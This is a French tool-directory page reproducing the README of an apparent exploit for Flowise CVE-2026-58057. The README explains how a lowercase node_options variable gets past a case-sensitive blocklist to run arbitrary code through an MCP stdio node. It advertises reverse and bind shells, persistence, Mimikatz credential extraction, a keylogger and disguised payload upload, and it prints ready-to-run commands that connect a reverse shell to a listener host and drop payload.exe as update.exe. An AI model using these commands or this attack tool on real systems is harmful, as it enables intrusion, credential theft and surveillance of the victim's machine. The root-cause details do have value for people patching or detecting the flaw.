Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Flowise-CVE-2026-58057-exploit — Exploit RCE Windows pour Flowise, ciblant CVE-2026-58057. Contourne la validation des variables d'environnement grâce à une faille de sensibilité à la casse. Utilise node_options pour injecter du code arbitraire via MCP stdio. Prend en charge le reverse shell, la persistance, le téléversement de fichiers et l'extraction d'identifiants. Réservé aux tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/flowise-cve-2026-58057-exploit
Mécanismes de PersistanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et Contrôle
Red Teaming
Développement de Charges Utiles
GitHubcerberusmrxi/flowise-cve-2026-58057-exploit

Flowise-CVE-2026-58057-exploit

Voir le dépôt
122il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit RCE Windows pour Flowise, ciblant CVE-2026-58057. Contourne la validation des variables d'environnement grâce à une faille de sensibilité à la casse. Utilise node_options pour injecter du code arbitraire via MCP stdio. Prend en charge le reverse shell, la persistance, le téléversement de fichiers et l'extraction d'identifiants. Réservé aux tests de sécurité autorisés.

Partager

Flowise CVE-2026-58057 - Exploit d'exécution de code à distance sur Windows

Project Badge CVE Badge Author Badge Version Badge CVSS Score Badge Affected Versions Badge Fixed Version Badge

📋 Vue d'ensemble

Cet outil est un exploit de qualité production pour CVE-2026-58057, une vulnérabilité critique d'exécution de code à distance dans Flowise sur les plateformes Windows. La vulnérabilité provient d'une validation des variables d'environnement sensible à la casse qui ne bloque pas la forme minuscule node_options, permettant aux attaquants de contourner la liste noire NODE_OPTIONS et d'exécuter du code arbitraire via la configuration stdio des MCP personnalisés.

L'exploit illustre des pratiques professionnelles de génie logiciel avec une architecture modulaire, une gestion complète des erreurs et la prise en charge de multiples types de charges utiles.

f1

f2

⚠️ Avertissement

IMPORTANT: Cet outil est fourni uniquement pour des tests de sécurité autorisés, des tests d'intrusion et à des fins éducatives. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce logiciel. Obtenez toujours une autorisation appropriée avant de tester un système.

🔍 Détails techniques

Cause racine de la vulnérabilité

# Vulnerable Validation (Case-Sensitive )
dangerous = {"PATH", "LD_LIBRARY_PATH", "DYLD_LIBRARY_PATH", "NODE_OPTIONS"}
if key in dangerous:  # Only blocks exact uppercase match
    raise ValueError(f"Modification not allowed")

Mécanisme de l'exploit

  1. L'attaquant s'authentifie sur Flowise

  2. Crée/modifie un nœud stdio MCP personnalisé

  3. Injecte la variable d'environnement node_options en minuscules

  4. Définit la valeur sur --require malicious-loader.js

  5. Node.js exécute le chargeur lorsque le MCP stdio s'exécute

  6. Exécution de code arbitraire obtenue

✨ Fonctionnalités

Capacités principales

  • ✅ Reverse Shell - Connexion de retour vers la machine de l'attaquant

  • ✅ Bind Shell - Ouvre un port d'écoute sur la cible

  • ✅ Exécution de commandes - Exécute des commandes système arbitraires

  • ✅ Upload de fichiers - Transfère des fichiers vers le système cible

  • ✅ Persistance - Plusieurs mécanismes de persistance

  • ✅ Collecte d'informations - Recueille des informations sur le système

  • ✅ Extraction d'identifiants - Intégration Mimikatz

  • ✅ Capture d'écran - Capture les captures d'écran du bureau

  • ✅ Keylogger - Installe une capacité d'enregistrement des frappes clavier

Caractéristiques techniques

  • 🔐 Méthodes d'authentification multiples - Clé API ou nom d'utilisateur/mot de passe

  • 🔄 Logique de nouvelle tentative automatique - Résiliente face aux problèmes réseau

  • 🧹 Auto-nettoyage - Supprime les fichiers chargeurs de la cible

  • 🌐 Multi-plateforme - Fonctionne sur Windows/Linux/macOS

  • 🎨 Sortie colorée - Lisibilité améliorée

  • 📊 Débogage verbeux - Journalisation détaillée pour le dépannage

📦 Installation

Prérequis

  • Python 3.6 ou supérieur

  • pip (gestionnaire de paquets Python)

Installation rapide

# Clone repository
git clone https://github.com/CerberusMrXi/Flowise-CVE-2026-58057-exploit
cd Flowise-CVE-2026-58057-exploit

# Install dependencies
pip install -r requirements.txt

# Or minimal installation
pip install requests urllib3

Installation Docker (optionnelle)

FROM python:3.9-alpine
RUN apk add --no-cache gcc musl-dev
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY exploit.py .
ENTRYPOINT ["python3", "exploit.py"]

🚀 Utilisation

Options de la ligne de commande

python3 exploit.py --help

Options d'authentification

OptionDescriptionExemple
-t, --targetURL de Flowise (obligatoire)http://localhost:3000
-k, --api-keyClé API Flowiseflowise_abc123...
-u, --usernameNom d'utilisateuradmin
-p, --passwordMot de passepassword123

Options de charge utile

OptionDescriptionExemple
--payloadType de charge utilereverse_shell
--lhostHôte de l'écouteur192.168.1.100
--lportPort de l'écouteur4444
--commandCommande à exécuterwhoami
--local-fileFichier à téléverserpayload.exe
--remote-pathChemin d'enregistrement distantC:\\Temp\\update.exe

Options d'exécution

OptionDescription
--interactiveDémarrer un shell interactif
--verboseActiver la sortie de débogage
--timeoutDélai d'expiration des requêtes en secondes
--retriesNombre de tentatives

📝 Exemples d'utilisation

1. Reverse Shell de base

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444

2. Reverse Shell interactif

python3 exploit.py -t http://192.168.1.100:3000 -u admin -p password \
    --payload reverse_shell \
    --lhost 192.168.1.50 \
    --lport 4444 \
    --interactive

3. Exécution de commande

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload command_exec \
    --command "whoami"

4. Upload de fichier

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload file_upload \
    --local-file /path/to/payload.exe \
    --remote-path "C:\\ProgramData\\update.exe"

5. Extraction d'identifiants (Mimikatz)

python3 exploit.py -t http://192.168.1.100:3000 -k YOUR_API_KEY \
    --payload mimikatz

6. Installation de la persistance

Télécharger l’outil